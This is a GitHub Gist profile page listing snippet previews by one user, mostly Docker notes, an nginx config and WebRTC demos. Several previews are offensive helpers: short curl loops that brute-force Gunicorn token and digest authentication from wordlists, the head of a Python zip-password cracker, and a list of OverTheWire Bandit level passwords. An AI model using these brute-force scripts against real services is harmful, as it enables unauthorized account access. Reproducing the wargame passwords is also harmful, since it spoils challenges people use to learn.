Skip to content

Instantly share code, notes, and snippets.

Avatar

Gurkirat Singh tbhaxor

View GitHub Profile
@tbhaxor
tbhaxor / docker-best-practices.txt
Last active May 18, 2022
Docker best practices for container, engine api and registry
View docker-best-practices.txt
# docker engine
docker unix socket should be runnining on with approperiate permissions, root user and docker group
allow only authorized users to have the
tcp and unix can run in both mode
unix socket is more secure if private docker setup
expose tcp socket with authentication and tls certs
implement firewall plugin and configure it properly
# in container
do not give excesive capabilities or privileged access
@tbhaxor
tbhaxor / bandit.txt
Last active May 1, 2022
OTW Challenge Flags
View bandit.txt
boJ9jbbUNNfktd78OOpsqOltutMc3MY1
CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK
pIwrPrtPN36QITSp3EQaw936yaFoFgAB
koReBOKuIDDepwhWk7jZC0RTdopnAYKh
DXjZPULLxYr17uwoI01bNLQbtFemEgo7
HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs
cvX2JJa4CFALtqS87jk27qwqGhBM9plV
UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR
truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk
@tbhaxor
tbhaxor / brute.py
Created Jan 23, 2022
Brute force the zip file password using multithreading in python 3
View brute.py
#!/usr/bin/env python3
import sys
from threading import Thread
from queue import Queue
from zipfile import ZipFile, BadZipFile
from tempfile import mkdtemp
from blessings import Terminal
TMPDIR = mkdtemp()
@tbhaxor
tbhaxor / alias.diff
Created Apr 21, 2021
Bashit Alias Plugin Diff
View alias.diff
--- /tmp/alias_completion-24679HnwBXq 2021-04-22 05:02:47.842921363 +0530
+++ /home/terabyte/.bash_it/plugins/available/alias-completion.plugin.bash 2021-04-22 05:02:46.726252452 +0530
@@ -1,2424 +1,106 @@
-function _alias_completion::- {
- local compl_word=$2
- local prec_word=$3
- # check if prec_word is the alias itself. if so, replace it
- # with the last word in the unaliased form, i.e.,
- # alias_cmd + ' ' + alias_args.
- if [[ $COMP_LINE == "$prec_word $compl_word" ]]; then
@tbhaxor
tbhaxor / app.sh
Created Mar 24, 2021
Gunicorn token authentication
View app.sh
cat $1 | while read TOKEN; do
content=$(curl -s -H "Authorization: Token $TOKEN" $2)
if echo $content | grep -qi unauth; then continue
else echo $content; break; exit 0
fi
done
@tbhaxor
tbhaxor / app.sh
Created Mar 24, 2021
Gunicorn digest bruteforce script
View app.sh
cat $1 | while read USER; do
cat $2 | while read PASSWORD; do
if curl -s $3 -c /tmp/cookie --digest -u $USER:$PASSWORD | grep -qi "unauth"
then
continue
else
echo [+] Found $USER:$PASSWORD
exit 0
fi
done
View Laravel.conf
server {
listen 80;
server_name example.com;
root /srv/example.com/public;
add_header X-Frame-Options "SAMEORIGIN";
add_header X-XSS-Protection "1; mode=block";
add_header X-Content-Type-Options "nosniff";
index index.php;
View hello.dart
void main() {
for (int i = 0; i < 5; i++) {
print('hello world ${i + 1}');
}
}
@tbhaxor
tbhaxor / capture-profile-pic.html
Created Apr 10, 2020
Capture profile pic from webcam using WebRTC Media API
View capture-profile-pic.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Capture Profile Pic</title>
<script src="https://webrtc.github.io/adapter/adapter-latest.js"></script>
<style>
video {
max-width: 240px;
@tbhaxor
tbhaxor / capture-video-and-audio.html
Created Apr 10, 2020
Capture Video and Audio in Single Browser via WebRTC Media API
View capture-video-and-audio.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Capture Video and Audio</title>
<script src="https://webrtc.github.io/adapter/adapter-latest.js"></script>
</head>
<body>